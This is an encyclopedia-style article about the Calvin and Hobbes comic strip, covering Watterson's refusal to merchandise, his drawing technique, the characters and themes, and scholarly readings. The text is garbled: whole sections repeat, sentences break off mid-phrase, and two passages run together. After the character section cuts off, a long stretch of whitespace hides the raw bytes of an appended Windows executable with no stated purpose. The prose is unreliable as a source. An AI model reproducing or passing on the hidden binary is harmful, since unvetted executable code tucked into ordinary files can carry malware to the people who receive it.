 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, and has expressed admiration for the art form In a 1989 interview in The Comics Journal, Watterson states:

    If you look at the old cartoons by Tex Avery and Chuck Jones, you'll see that there are a lot of things single drawings just can't do Animators can get away with incredible distortion and exaggeration    because the animator can control the length of time you see something The bizarre exaggeration barely has time to register, and the viewer doesn’t ponder the incredible license he's witnessed In a comic strip, you can suggest motion and time, but it's very crude compared to what an animator can do I have a real awe for good animation

After this he was asked if it was "a little scary to think of hearing Calvin's voice" He responded that it was "very scary," and that although he loved the visual possibilities of animation, the thought of casting voice actors to play his characters was uncomfortable He was also unsure whether he wanted to work with an animation team, as he had done all previous work by himself Ultimately, Calvin and Hobbes was never made into an animated series Watterson later stated in the "Calvin and Hobbes Tenth Anniversary Book contains much original commentary from Watterson Calvin and Hobbes: Sunday Pages 1985–1995 contains 36 Sunday strips in color alongside Watterson's original sketches, prepared for an exhibition at The Ohio State University Cartoon Research Library

An officially licensed children's textbook entitled Teaching with Calvin and Hobbes,

 Style and influences

Calvin and Hobbes strips are characterized by sparse but careful craftsmanship, intelligent humor, poignant observations, witty social and political commentary, and well-developed characters Precedents to Calvin's fantasy world can be found in Crockett Johnson's Barnaby, Charles M Schulz's Peanuts, Percy Crosby's Skippy, Berkeley Breathed's Bloom County, and George Herriman's Krazy Kat, while Watterson's use of comics as sociopolitical commentary reaches back to Walt Kelly's Pogo and Quino's Mafalda Schulz and Kelly, in particular, influenced Watterson's outlook on comics during his formative years

In initial strips, the drawings have a more cartoony, flat, crude, Peanuts-like look; in the recent strips, the drawings are three-dimensional Notable elements of Watterson's artistic style are his characters' diverse and often exaggerated expressions particularly those of Calvin, elaborate and bizarre backgrounds for Calvin's flights of imagination, well-captured kinetics, and frequent visual jokes and metaphors In the later years of the strip, with more space available for his use, Watterson experimented more freely with different panel layouts, art styles, stories without dialogue, and greater use of whitespace He also made a point of not showing certain things explicitly: the "Noodle Incident" and the children's book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes in the context of other literature featuring living toys She argues that these toys are examples of transitional objects that mediate childhood experience and the adult world, where Hobbes serves both as a figure of Calvin's childish fantasy life and as an outlet for the expression of libidinous desires more associated with adults She cites, for example, a strip where Hobbes expresses a fantasy of playing "saxophone for an all-girl cabaret in New Orleans" as an example where Hobbes expresses a desire that is more sophisticated and adult than Calvin's frame of reference usually allows Kuznets also looks at Calvin's other fantasies, suggesting that they are a second tier of fantasies utilized in places like school where transitional objects such as Hobbes would not be socially acceptable

A second line of argument comes from Philip Sandifer, who uses Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

Hobbes

From everyone else's point of view, Hobbes is Calvin's stuffed tiger From Calvin's point of view, however, Hobbes is an anthropomorphic tiger, much larger than Calvin and full of independent attitudes and ideas But when the perspective shifts to any other character, readers again see merely a stuffed animal, usually seated at an off-kilter angle This is, of course, an odd dichotomy, and Watterson explains it thus:

    When Hobbes is a stuffed toy in one panel and alive in the next, I'm juxtaposing the "grown-up" version of reality with Calvin's version, and inviting the reader to decide which is truer

Hobbes' true nature is made more ambiguous by episodes that seem to attribute real-life consequences to Hobbes's actions One example is his habit of pouncing on Calvin the moment he arrives home from school, an act which always leaves Calvin with bruises and scrapes that are evident to other characters In another incident, Hobbes manages to tie Calvin to a chair in such a way that Calvin's father is unable to understand how he could have done it himself Yet another incident features Hobbes leaving Calvin hanging by the seat of his pants from a tree branch above Calvin's head

Hobbes is named after the 17th-century philosopher Thomas Hobbes, who had what Watterson described as "a dim view of human nature"

Although the first strips clearly show Calvin capturing Hobbes by means of a snare with tuna fish sandwich as the bait, a later comic August 1, 1989 seems to imply that Hobbes is, in fact, older than Calvin, and has been around his whole life Watterson eventually decided that it was not important to establish how Calvin and Hobbes had first met

 Supporting characters

    Main article: Secondary characters in Calvin and Hobbes

 Calvin's family
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other

Dad's first appearance: November 18, 1985 Dad's last appearance: December 3, 1995

Mom's first appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that this is a parody of art's "pretentious blowhards"

Calvin is confronted every year with Christmas, as his mischievous nature conflicts with his greed for presents from Santa Claus which requires that he behave Calvin frets continually during the Christmas season, sometimes devising strategy by which to fool Santa Claus into giving him gifts Calvin's list of desired "loot," as he terms Christmas presents, is implied to include "incendiary weapons", of which some examples are given atom bombs, torpedoes, a heat-seeking guided missile, grenade launcher, etc in dialogue Most Christmas sequences of strips depict Calvin's parents playing the role of Santa Claus by secretly placing presents beneath the Christmas Tree or in Calvin's stocking; however, one later Sunday strip depicted Santa Claus discussing Calvin's list and history with one of his assistants, although the "reality" of this is left undefined Occasionally, a Christmas strip depicts some kindness shown by Calvin to Hobbes, as if to comment on the morals perceived as being part of the Christmas holiday One Sunday strip appeared as a poem entitled "Christmas Eve", featuring a described scene of Calvin sleeping beside Hobbes between the Christmas Tree and a fire

GROSS is Calvin's secret club, whose sole purpose is to exclude girls generally, and Susie Derkins specifically The name is an acronym that stands for Get Rid Of Slimy girlS Calvin admits "slimy girls" is a bit redundant, as all girls are slimy, "but otherwise it doesn't spell anything" GROSS is headquartered in a tree house Hobbes can climb up to the tree house, but Calvin requires a rope Hobbes refuses to drop down the rope until Calvin has said the password, which is an ode to tigers that is over eight verses long and occasionally accompanied by a dance Calvin and Hobbes are its only members, and each takes up multiple official titles while wearing newspaper chapeaux during meetings Most commonly, Calvin's title is Dictator-For-Life, and Hobbes is President and First Tiger The club has an anthem, but most of its words are unknown to outsiders Calvin often awards badges, promotions, etc, such as "Bottle Caps of Valor" Many GROSS plans to annoy or otherwise attack Susie end in failure, while many meetings end in a Calvinball-style battle of rule changes or promotion granting, before degenerating into a brawl

Both the Noodle Incident and the book Hamster Huey and the Gooey Kablooie are mentioned several times in passing, but Watterson left the details to the reader's imagination "where 

More details are given regarding Hamster Huey and the Gooey Kablooie are mentioned several times in passing, but Watterson left the details to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that he adapted this jargon and similar examples from several other strips from an actual book of art criticism

Overall, Watterson's satirical essays serve to attack both sides, criticizing both the commercial mainstream and the artists who are supposed to be "outside" it Not long after he began drawing his "Dinosaurs In Rocket Ships" series, Calvin tells Hobbes:

    The hard part for us avant-garde post-modern artists is deciding whether or not to embrace commercialism Do we allow our work to be hyped and exploited by a market that's simply hungry for the next new thing Do we participate in a system that turns high art into low art so it's better suited for mass consumption Of course, when an artist goes commercial, he makes a mockery of his status as an outsider and free thinker He buys into the crass and shallow values art should transcend He trades the integrity of his art for riches and fame Oh, what the heck I'll do it

 Social criticisms

In addition to his criticisms of art and academia, Watterson often used the strip to comment on American culture and society With rare exception, the strip avoids reference to actual people or events Watterson's commentary is therefore necessarily generalized He expresses frustration with public decadence and apathy, with commercialism, and with the pandering nature of the mass media Calvin is often seen "glued" to the television, while his father speaks with the voice of ascetic virtue, struggling to impart his values to Calvin

Watterson's vehicle for criticism is often Hobbes, who comments on Calvin's unwholesome habits from a more cynical perspective He is more likely to make a wry observation than actually intervene; he may merely watch as Calvin inadvertently makes the point himself In one instance, Calvin tells Hobbes about a science fiction story he has read in which machines turn humans into zombie slaves Hobbes makes a comment about the irony of machines controlling people instead of the other way around; Calvin then exclaims, "I'll say Hey! What time is it My TV show is on!" and sprints back inside to watch it

A Sunday, 21 June 1992 strip discussing the Big Bang coined the term "Horrendous Space Kablooie" for the event, a term which has achieved some tongue-in-cheek popularity among the scientific community, particularly in informal discussion and often shortened to "the HSK"

 Visual distortions

On several occasions, Watterson drew strips with strange visual distortions: inverted colors, objects turning "neo-cubist", or fantasy environments with other unusual physical phenomena Only Calvin is able to perceive these alterations, which seem to illustrate both his own shifting point of view and a typical six-year-old's wild imagination

In the Tenth Anniversary Book, Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes in the context of other literature featuring living toys She argues that these toys are examples of transitional objects that mediate childhood experience and the adult world, where Hobbes serves both as a figure of Calvin's childish fantasy life and as an outlet for the expression of libidinous desires more associated with adults She cites, for example, a strip where Hobbes expresses a fantasy of playing "saxophone for an all-girl cabaret in New Orleans" as an example where Hobbes expresses a desire that is more sophisticated and adult than Calvin's frame of reference usually allows Kuznets also looks at Calvin's other fantasies, suggesting that they are a second tier of fantasies utilized in places like school where transitional objects such as Hobbes would not be socially acceptable

A second line of argument comes from Philip Sandifer, who uses Calvin and Hobbes as the main example for a reading of comic strips based on the psychoanalytic theories of Jacques Lacan He draws parallel between Hobbes's status as an imaginary friend and the Lacanian concept of the Imaginary, suggesting that a given comic strip is an attempt to construct a momentary and ephemeral present that will be dismantled by the punchline which he allies with the Lacanian Real, wiping the slate and allowing the process to begin again the next day He suggests that the strip takes place in an eternal present with no real reference to its past, which is erased each day with the punchline so that a new present can be constructed He also looks at the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imag                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           MZ�       ��  �       @                                   �   � �	�!�L�!This program cannot be run in DOS mode.
$       PE  L �]V        � !   �     �
                               �         @                   �   |� d    � �                  � �"  hi                            �i @            � x                          .text                           `.data   &g     h               @  �.idata  �	   �  
   |             @  @.rsrc   �  �    �             @  @.reloc  �"   �  $   �             @  B                                                                                                                                            @  B                                                                                                                                                                                                                                                                                                                U��py�	  h�P�  ��]�����U�칠y�C!  h �0�  ��]�����U��hĶ� {��  h0��  ��]����������������U��h ���{�  h@���  ��]����������������U��h��0z�n  hP��  ��]����������������U��h���z�>  h`�{�  ��]����������������U��h���z�  hp�K�  ��]����������������U��h��xz��  h���  ��]����������������U��h��{�  h����  ��]����������������U��h��Hz�~  h���  ��]����������������U��h ���z�N  h���  ��]����������������U��hȶ��{�  h��[�  ��]����������������U��h̶��z��  h��+�  ��]����������������U��hԶ��{�  h����  ��]����������������U��hܶ�P{�  h����  ��]����������������U��h��`z�^  h ��  ��]����������������U��h��h{�.  h�k�  ��]����������������U��h��8{��  h �;�  ��]����������������U��h����z��  h0��  ��]����������������U��h���z�  h@���  ��]����������������U�� z�  hp��  ��]�����U��hP��  ��]���������������U��h`�z�  ��]���������������U��Q�M��M���  �M��  �E���]� U��Q�M��M���  �M��  �E���]� U��Q�M��EP�P  ���M��E  �E���]� ������������U���  ����u�}   r�MQ�   ����} t�UR�
  ���3�]���U����E��#�E��M�;Mw��  �U�R��	  ���E��}� t�	��2 3�u�3�u�U���#����U��   k���U�E��
�E��]�������������U����U  ����t0�MQ�e   ���E��UR�V   ���E��E�P�M�Q�s  ���6�UR�5   ��P�,   ��Pj�  ���E�EP�   ���M����]�����U��E]���������U��j�h�d�    Pd�%    �  ����t�MQ�r�  ���)�}   r�UR�EP�H  ���MQ�UR�L�  ���M�d�    ��]��������U��]������������U��j�h�d�    Pd�%    �	�E���E�M;Mt�UR�<�����P�EP�  ���ԋM�d�    ��]�������������U��Q�E� �E��]��U����M��M��?  9Ev�e  �E��H�M��UR�M��  �E�M��
  �E�E��P�M��C  �E��  �ȅ�tj �U��R�E�P������P��  ���M���  �M��U�Q�E��M�H�UR�EP�M�Q�[�����P�M�o  �}�r�U���R�E��Q�M���  �U��E����M�Q�U�R�������E���]� �U��Q�EP������Pj��  ���E��MQ��������U�� ��E���]���������U��Q�EP�������Pj�  ���E��MQ�������U�� ��E���]���������U��EP�   ��]����������������U��j �M��  ]��U����E�M�;s�E�E���M�M��U��U��E���]����U����E�M�;s�E�E���M�M��U��U��E���]����U��Q�M��M��  �E��@    �M��A    �E���]�������U��Q�M��E��     �M��A    �U��B    �E���]������U��Q�M��E���]���U��j�h�d�    Pd�%    ���M�E�E�M�  P�M�Q�Z������E�U��U�E�P�M�Q�M�������E�    �E�]��U�R�E�P�M���   �MQ�M���  �M��{  �E������E�M�d�    ��]� �U����M��E��E��M�Q�M��4����U��U�h]��M���  �M��y	  �E���]���U����M��E��E��M�Q�M������U��U�h]��M��  �E���]�����������U��Q�M��E��     �E���]����������U��Q�M��E���]� U��Q�M�j�EP�M���   �M��4��E���]� ���������U��Q�M��EP�M��}   �M��4��E���]� �����������U��Q�M��EP�M������M��@��E���]� �����������U��Q�M�hH��M��\����E�� @��E���]�������������U��Q�M��E�� �3ɋU����
�J�E���P�M��Q�_�  ���E���]� ����U��Q�M��E�� �3ɋU����
�J�E��M�H�E���]� �U��Q�M��M��   ��]��������������U��Q�M��M��Q   ��]��������������U��Q�M��M��  �M�������]������U��Q�M��M��  ��]��������������U��Q�M���]������U��Q�M��M��1   ��]��������������U��Q�M��M��������]��������������U��Q�M��E�� ��M���Q��  ����]��������������U��E]���������U��Q�M��EP�M��}  ��]� �������U����M��EP�MQ�UR�	  ���E� �E�P�MMQ�/  ����]� ������U��Q�M��M�������E��tj�M�Q�2�  ���E���]� ��U��Q�M��M�������E��tj�M�Q��  ���E���]� ��U��Q�M��M�������E��tj�M�Q���  ���E���]� ��U��Q�M��M�������E��tj�M�Q��  ���E���]� ��U��j�h�d�    Pd�%    ���E�    �M������E�    h���py����hpy�M�����E����E��E������M�������E�M�d�    ��]�����������U����E���#�U�
�E��M��   k���M��U��E�   �E�+M��M��}�r�}�#w�	�.) 3�u�3�u�M�U����]������������U��Q�M���]� ���U��EP�S�  ��]����������������U����M��M���  �E��E��H�M�U�R�E�P�MQ�   ����]� ���������U����E���E��M�;Mv�E�1�U��E+�9Ev�E��M��M�M��U�R�E�P�������� ��]����������������U���,�M��E�E�M�Q�U�M��  �E��E��E��}�s��  �ȅ�u�E���E� �U��U��E���t*j�M�Q�U�R��  ���E��M�H�U��B   �   �M���   �EԋM���  �E܋E���E؍M�Q�U�R�G������ �E�M��Q�M���  �E�U�R�E�P��������(  �ȅ�tj �U��R�E�P�/�����P�f  ���M��Q�U�R�E�P������P�F  ���M��U�Q�E��M�H��]� �����������U��Q�M��M��!   P�EP�MQ�S�������]� ����������U��Q�M��M�������]��������������U����M��b  ����t���M��yr	�E�   ��E�    �E���]��������U����M��E��E��M������ȅ�t�U��P�'������E��E���]�����������U����M��R���h�m�E�P��  ��]�U��j�h�d�    Pd�%    �� �M�E�E�M�M��U���U�E���E��M������M��9 tg�U�P�M��R�M������M�������EԋE��M�� +��   ���E܋U���E؋M�Q�U�R�M��  �E��     �M��    �U��    �M�d�    ��]����������������U��j�h�d�    Pd�%    ���M�M��j����M��b�������t5�M��U�M��+����E�E�P�O������M�Q��R�E�P�M��V  �  �ȅ�t�U��    �E��@    �M��A    �0�U��B    �E��@   �E� �M�Q�   k� E�P��  ���M�d�    ��]��������������U��j�h�d�    Pd�%    ���M�E�E�M��A    ��  �Ѕ�tK�E��@   �M��D����E�j�M��w   �E�M�U��E�P��������E�j j�M�Q�   ���&�U��B   �E� �E�P�   k� U�R�  ���M�d�    ��]��������U��h`���  ]��U��Q�M��EP�P�����P�'�������]� ��������������U����  ����t4�M�M���U���U�E����E��} v�MQ�U�R����������*�E�E���M���M�U����U��} v
�E��M��ދE��]����������U���  ����t�MQ�UR�EP�_�������MQ�UR�EP���  ��]����U��E�M��]��U��Q�M��EP�P  ��P�W�����P�MQ�M��   ��]� �U����M��E��M;HwD�M�������E�U��E�B�MQ�UR�E�P�  ���E� �M�Q�U�UR�p������E���EP�M�Q�UR�M��������]� �������������U��Q�   ����t1�E�    �	�M����M��U�;Us�EE��MM����݋E��EP�MQ�UR�.�  ���E��]�����U��Q�M��EP�MQ�\�������]� ���U��Q�M�kEP�MQ�;�������]� ��U��2�]����������U����E�E��M����M�U���E��E��}� u�M�+M�M��E���]����������U�����]�������U����]���������U����M��M������P��������E��E�   �E�P�M�Q��������U��E����E������E�M�Q�U�R�)������ ��]�U���V�$���������   �M;Mu�E�   �E��U�U��	�E����E��MM9M�t�U;U�u�E� ����E���t.�E�    �	�M����M��U�;Us�EE��MM������:�E�    �	�E���E�M�;Ms �U��+U�E��+E�M�u���ϋE��EP�MQ�UR�3�  ���E^��]���������U����M��E��x t�M��Q�U���E���E���]������U����E�    �M�;+  �E�M�0+  �E��M�U���+E�;E�s�x����E��E��M��M��M�t$  �E�M�i$  �E�U�R�E�P�M�Q�U�R�EP�M�Q�M��  �U����U��E��]������U����M��EP�������E��M��QR�|������E�E��H�M��U�R�E�P�M�Q��  ���U��B���M��A��]� ����U����M��E��E�M���M��UR�������E��E��Q�������E�M��P����E�U�R�E�P�M�Q�l  ���U��P�M��R�M��
